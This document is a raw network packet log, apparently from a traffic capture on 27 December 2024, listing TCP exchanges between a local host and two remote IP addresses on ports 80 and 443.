                                                                                              Dec 27, 2024 22:33:10.995671034 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.996952057 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.997064114 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.997112036 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.998249054 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.998301029 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.998380899 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.999012947 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.999129057 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:10.999178886 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.000931025 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.000983953 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.001068115 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.001143932 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.001159906 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.001209974 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.003207922 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.003266096 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.003309965 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.003578901 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.003622055 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.003662109 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.005325079 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.005352974 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.005399942 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.006221056 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.006273985 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.006438971 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.007448912 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.007473946 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.007524967 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.008888960 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.008932114 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.009008884 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.009428978 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.009499073 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.009546041 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.011588097 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.011673927 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.011691093 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.011754036 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.011754990 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.011759043 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.013622999 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.013726950 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.013778925 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.014230967 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.014281034 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.014343977 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.015732050 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.015841961 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.015887022 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.016875982 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.016925097 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.016979933 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.017817020 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.017904043 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.017949104 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.019521952 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.019571066 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.019637108 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.019861937 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.019949913 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.019994020 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.022015095 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.022109985 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.022159100 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.022161007 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.022205114 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.022291899 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.024032116 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.024156094 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.024199009 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.024785042 CET8049743147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.024858952 CET4974380192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.026212931 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.026251078 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.026303053 CET4974180192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.028244019 CET8049741147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.045708895 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.047300100 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.047427893 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.047585011 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.048171997 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.048290014 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.048337936 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:11.049985886 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.050091028 CET8049742147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:11.050134897 CET4974280192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.302596092 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.302700996 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.305624962 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.305804014 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.306186914 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.308854103 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.308927059 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.309017897 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.312033892 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.312176943 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.312387943 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.358233929 CET49747443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:13.361638069 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.361752033 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.361805916 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.362854958 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.362968922 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.363014936 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.365448952 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.365536928 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.365602016 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.367896080 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.368010044 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.368057013 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.370404005 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.370524883 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.370573044 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.372915030 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.373008013 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.373055935 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.392448902 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.392532110 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.392589092 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.393704891 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.394191980 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.394238949 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.394311905 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.394371033 CET49746443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:13.394465923 CET49746443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:13.394529104 CET44349746104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.396708012 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.396759033 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.396848917 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.399238110 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.399279118 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.399288893 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.401710987 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.401767969 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.401827097 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.404315948 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.404366970 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.404366970 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.406766891 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.406826973 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.406877995 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.409317017 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.409364939 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.409408092 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.411792994 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.411842108 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.411974907 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.414314032 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.414361954 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.414436102 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.416836977 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.416894913 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.416937113 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.419342041 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.419406891 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.419414043 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.421813011 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.421860933 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.421906948 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.422929049 CET49747443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:13.422993898 CET49747443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:13.423124075 CET44349747104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.424196959 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.424245119 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.424292088 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.426441908 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.426457882 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.426486969 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.428602934 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.428647995 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.428724051 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.430752993 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.430799961 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.430847883 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.432846069 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.432899952 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.432951927 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.434945107 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.434988976 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.435003996 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.436952114 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.437004089 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.437015057 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.473995924 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.474047899 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.474086046 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.474874020 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.474932909 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.474957943 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.476778984 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.476830006 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.476872921 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.478626013 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.478672981 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.478719950 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.480515957 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.480570078 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.480616093 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.482384920 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.482402086 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.482431889 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.484364033 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.484411001 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.484447002 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.486087084 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.486131907 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.486274958 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.488010883 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.488056898 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.488081932 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.489833117 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.489877939 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.489890099 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.491705894 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.491750002 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.491863966 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.493627071 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.493691921 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.493753910 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.495521069 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.495568037 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.495671034 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.497365952 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.497416019 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.497482061 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.499272108 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.499309063 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.499326944 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.501204014 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.501247883 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.501260042 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.502995968 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.503043890 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.503097057 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.504852057 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.504899979 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.504925013 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.506701946 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.506753922 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.506805897 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.508590937 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.508636951 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.508723974 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.510515928 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.510562897 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.510592937 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.512429953 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.512478113 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.512487888 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.537163019 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.537216902 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.537287951 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.538033962 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.538080931 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.563023090 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.563072920 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.563122034 CET4974480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:13.563795090 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:13.563908100 CET8049744147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.611479044 CET44349750104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.611527920 CET49750443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.615060091 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.615145922 CET49751443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.615171909 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.615206003 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.615271091 CET49751443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.615277052 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.615326881 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.615369081 CET49751443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.633289099 CET49750443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.633304119 CET44349750104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.633339882 CET49750443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.633346081 CET44349750104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.634308100 CET49751443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.634336948 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.634352922 CET49751443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.634357929 CET44349751104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.842747927 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.842806101 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:16.843023062 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.844233036 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:16.844249964 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:17.800374031 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:17.800513983 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:17.802248955 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:17.802258015 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:17.802572012 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:17.804183960 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:17.804204941 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:17.804272890 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.118591070 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.118671894 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.120131969 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.120143890 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.120387077 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.121715069 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.121865034 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.121896029 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.121953964 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.121961117 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579245090 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579401970 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579497099 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.579526901 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579552889 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579606056 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.579653978 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579814911 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.579865932 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.579879999 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.592124939 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.592171907 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.592186928 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.600522995 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.601094961 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.601109982 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.657634974 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.698790073 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.702876091 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.705424070 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.705440998 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.784090042 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.784193993 CET44349755104.21.60.24192.168.2.4
